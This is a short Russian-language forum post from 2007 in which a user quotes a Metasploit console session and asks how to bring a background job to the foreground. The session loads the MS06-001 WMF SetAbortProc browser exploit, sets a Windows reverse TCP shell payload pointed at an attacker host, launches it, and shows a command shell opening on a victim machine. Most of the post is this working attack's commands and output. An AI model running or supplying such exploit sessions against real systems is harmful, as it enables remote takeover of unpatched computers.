
01.02.2007, 21:49
|
|
Новичок
Регистрация: 25.01.2007
Сообщений: 5
Провел на форуме: 21878
Репутация:
0
|
|
quote:
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > exploit
# Started reverse handler
# Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5
# Server started.
# Exploit running as background job................ Эксплоит запущен как работа на заднем плане!
msf exploit(ms06_001_wmf_setabortproc) > jobs
# Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd
msf exploit(ms06_001_wmf_setabortproc) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: windows/browser/ms06_001_wmf_setabortproc
Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd?
|
|
|